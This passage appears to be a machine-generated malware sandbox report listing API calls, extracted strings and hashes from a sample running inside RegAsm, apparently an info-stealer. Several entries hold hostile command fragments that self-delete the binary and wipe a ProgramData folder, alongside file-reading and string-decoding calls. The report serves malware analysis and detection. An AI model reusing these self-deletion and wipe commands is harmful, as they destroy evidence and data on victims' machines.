                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00410952
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041098E
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 004109D5
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00410A1C
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00410A63
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410BC6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                                • API String ID: 49562497-2658103896
                                                                                                                                                                                                • Opcode ID: 04316544489357f2afa6c79bac0ca829a868ff856b9ec0809f4fe70a505de954
                                                                                                                                                                                                • Instruction ID: 0b5926a7128f84a3b2f222f3571b1dce6d90bbe111d8c5c82d424c5efd5d6e05
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04316544489357f2afa6c79bac0ca829a868ff856b9ec0809f4fe70a505de954
                                                                                                                                                                                                • Instruction Fuzzy Hash: 37C16271804219AFDF54EBA5D845EDEBBB9AF14304F10447AF505F3192EB38AB88CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                                                                                                                                                                • API String ID: 0-3330941169
                                                                                                                                                                                                • Opcode ID: d0a43ee65c8d757d9063e16e7574d3220666983d4be0385eb926e458fdd0653f
                                                                                                                                                                                                • Instruction ID: 389387e5f51f5236985df99b9ac9a6b5a0d4f7680fe6ae746dba374890c773fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0a43ee65c8d757d9063e16e7574d3220666983d4be0385eb926e458fdd0653f
                                                                                                                                                                                                • Instruction Fuzzy Hash: E7712BBAF012515BEE059B19BD416DEBBD5AFC5212F0404BEF942C7201FB21F94A87B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00410BFC
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415D19), ref: 00410C1E
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00410C29
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410C40
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitH_prologProcessstrtok_s
                                                                                                                                                                                                • String ID: block
                                                                                                                                                                                                • API String ID: 3745986650-2199623458
                                                                                                                                                                                                • Opcode ID: 1a81c56778e5a514f09cbb8ab07a3d02e0e3386f1a59973d73ddf0c0ab6236da
                                                                                                                                                                                                • Instruction ID: df4849ec62e33a5e79d91673b6abf48bfc807c7432add9134e53bec16debb989
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a81c56778e5a514f09cbb8ab07a3d02e0e3386f1a59973d73ddf0c0ab6236da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2041D779A40B11ABDB10AFF5AC45AEB77ADBB05749720462BB403E2550E7F8A5C08B18
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                                                                                                                                                                • API String ID: 0-1070437968
                                                                                                                                                                                                • Opcode ID: ee373db9e8858e67ad36e18b1ba0ec5f35d7c97911b3f8ed77f22f05a554296f
                                                                                                                                                                                                • Instruction ID: 252e11fcdb0a8dc0b581dbcc0053057a365511732be12eebeeb4237b01422bd3
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee373db9e8858e67ad36e18b1ba0ec5f35d7c97911b3f8ed77f22f05a554296f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1102E2B59003019BE7109F34CC85BDB7BE8BFA4215F04892CF88A97342E775E449CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                                                                                                                                                                • API String ID: 0-3900766660
                                                                                                                                                                                                • Opcode ID: 0fbdf3c3bbb569f24a187c52a3de07e1548afe0886924fb28969c4d5e5305c11
                                                                                                                                                                                                • Instruction ID: 791dbb314feed1ae5385d1c59becfe19553156ba35f812a615625713a425ff07
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fbdf3c3bbb569f24a187c52a3de07e1548afe0886924fb28969c4d5e5305c11
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE1D2B4A047419BF710CF24D881BDB77F9AF88615F04492CE8899F341E775E84ACBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                                                                                                                                                                • API String ID: 0-1477268580
                                                                                                                                                                                                • Opcode ID: 177c141532b3b755865261c9be925ac8f27997911e56f7d85f79e9e301f7f54d
                                                                                                                                                                                                • Instruction ID: 3b2cd21488c1a77348c817d867e1c13a69f09d89cf51f4129796cca164c766fc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 177c141532b3b755865261c9be925ac8f27997911e56f7d85f79e9e301f7f54d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7151EFB5A003019FDB109F28DC91BA6B7F5FFA4315F04896DE9568B341E771E844CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00412616
                                                                                                                                                                                                • memset.MSVCRT ref: 00412636
                                                                                                                                                                                                • memset.MSVCRT ref: 00412642
                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00412657
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004127E3
                                                                                                                                                                                                • memset.MSVCRT ref: 004127F0
                                                                                                                                                                                                • memset.MSVCRT ref: 004127FE
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0041280F
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                • API String ID: 1312519015-206210831
                                                                                                                                                                                                • Opcode ID: 2d52401221631d3d1f354c715f94cbaa83706b91d1d0cf4e5a61c5fb4c4a708d
                                                                                                                                                                                                • Instruction ID: 3185a618bdba808ef0e449a7a5eb983d9a54b3b1afd772efa82c745700822a38
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d52401221631d3d1f354c715f94cbaa83706b91d1d0cf4e5a61c5fb4c4a708d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 685110B1C00258DADB01EBE1C986EDEBBB8AF18304F5045AFA545B3182DB785B49CB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s_data$data$id INTEGER PRIMARY KEY, block BLOB$idx$segid, term, pgno, PRIMARY KEY(segid, term)
                                                                                                                                                                                                • API String ID: 0-1009905541
                                                                                                                                                                                                • Opcode ID: 1af40d0754545ef80a2465a3bd91311787c326faaef44ccc71feca16b5fc4bba
                                                                                                                                                                                                • Instruction ID: a52e4a85186126051904bbd2d5fde67edc2af021f54ee9f019213d44b6f2427e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1af40d0754545ef80a2465a3bd91311787c326faaef44ccc71feca16b5fc4bba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6071D3719003109BEB145F24DE88B8B77ADFFA4256F00482CFD8697211DF35E958CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                                                                                                                                                                • API String ID: 0-3918257174
                                                                                                                                                                                                • Opcode ID: 1b89c150466eafac2c076d14f87496b73759d5d9a535080dd19444d3fc4ffe5b
                                                                                                                                                                                                • Instruction ID: fe9846d299fa908f5235d93dec90a06311a9b53c32abaf142ddf4985482397f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b89c150466eafac2c076d14f87496b73759d5d9a535080dd19444d3fc4ffe5b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 145124719003119BE700AF24DD85BDBB7A9EB84765F044628FC899B241D736F909CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!.15g$%!.20e$%lld$NULL$NULL
                                                                                                                                                                                                • API String ID: 0-2115304644
                                                                                                                                                                                                • Opcode ID: f0bcf32c68412fa1ee37dd0a3567ef71233d048655c39a3fa3778f54ab29b059
                                                                                                                                                                                                • Instruction ID: 1d797fbb47e695a8d10e09cbdcf73a9766c8a2647d9af2cc262a0dcea1e5e829
                                                                                                                                                                                                • Opcode Fuzzy Hash: f0bcf32c68412fa1ee37dd0a3567ef71233d048655c39a3fa3778f54ab29b059
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C5145799047105BEB01DF289C42AEBB7B5EF95304F048E4DF8D967202E335E94587A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-2988319395
                                                                                                                                                                                                • Opcode ID: acd9c4651e3a2edf4b6a59b3cf8f862b640366037497b76802bc61b286b79d88
                                                                                                                                                                                                • Instruction ID: 6cc8f17359c04affe67f28a1228e902adfea884fcf89a1069d1a31e20f0797d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: acd9c4651e3a2edf4b6a59b3cf8f862b640366037497b76802bc61b286b79d88
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9D1B2B49003419BEB108F34DCC5B9A77E8BFA4715F04892CE89A97341F7B5E549CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,origin
                                                                                                                                                                                                • API String ID: 0-4198660907
                                                                                                                                                                                                • Opcode ID: 5640ac008edb398939e79864a2eea28a8b2a0218eb70ec90ebc6e92bbb6e3774
                                                                                                                                                                                                • Instruction ID: 1319fd2117e04ac59bbb64e22e3d03c211cd0cc67d989766b5400cb7c27cca8f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5640ac008edb398939e79864a2eea28a8b2a0218eb70ec90ebc6e92bbb6e3774
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6171BFB1504300EFDB11AF58E880A9BBBB5FF98340F944D6CE98687260E733E854DB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • UNIQUE constraint failed: %s.%s, xrefs: 1B574BC9
                                                                                                                                                                                                • misuse, xrefs: 1B574C34
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B574C1E
                                                                                                                                                                                                • rtree constraint failed: %s.(%s<=%s), xrefs: 1B574BF9
                                                                                                                                                                                                • SELECT * FROM %Q.%Q, xrefs: 1B574B25
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B574C39
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B574C2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
                                                                                                                                                                                                • API String ID: 0-2013246442
                                                                                                                                                                                                • Opcode ID: fe2422c0eeb676f56bfd4ac87b61ad8d6aa9e075785fa95ca4230c676291f0d0
                                                                                                                                                                                                • Instruction ID: 8d0041b5dca52238b8112e4faa944a676c0565abc299b14a867d82447594b1e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: fe2422c0eeb676f56bfd4ac87b61ad8d6aa9e075785fa95ca4230c676291f0d0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C41F8B1B00215AFFB016F65DC89FEB3BACEFA4615F40492CFD4996201E721E94487B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                                                                                                                                                                • API String ID: 0-2846052723
                                                                                                                                                                                                • Opcode ID: f0deb81bf8e90758d0af503148d34d6a153f63d40c7ccd25d4c0e3813338b395
                                                                                                                                                                                                • Instruction ID: 20eb33c573c18f5759bb85da16ce8de0eaca7303382cd8988b704e99271d17d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: f0deb81bf8e90758d0af503148d34d6a153f63d40c7ccd25d4c0e3813338b395
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1241CBE1A053522FFB105630FC82FFB3B999FA5225F4445ADF8CA55240D72AEC06DA62
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3679126755
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00411CFB
                                                                                                                                                                                                • memset.MSVCRT ref: 00411D1C
                                                                                                                                                                                                • memset.MSVCRT ref: 00411D2A
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00411D56
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00411D74
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00411D88
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00411D9B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040B20D: _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040B20D: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040B20D: memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040FF83: GlobalAlloc.KERNEL32(00000000,00411E29,00000000,00000000,?,00411E29,?,?), ref: 0040FF8E
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000), ref: 00411E35
                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00411F04
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062AE
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalAlloc.KERNEL32(00000040,EY@,?,?,00405945,00000000,?,?), ref: 004062BC
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062D2
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalFree.KERNEL32(00000000,?,?,00405945,00000000,?,?), ref: 004062E1
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00411EAA
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004254B7,?,?,?,?,000003E8), ref: 00411EC7
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00411EE0
                                                                                                                                                                                                • lstrcat.KERNEL32(?,0042582C), ref: 00411EEE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 174962345-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: content$docsize
                                                                                                                                                                                                • API String ID: 0-1024698521
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041174F
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00411B1E
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
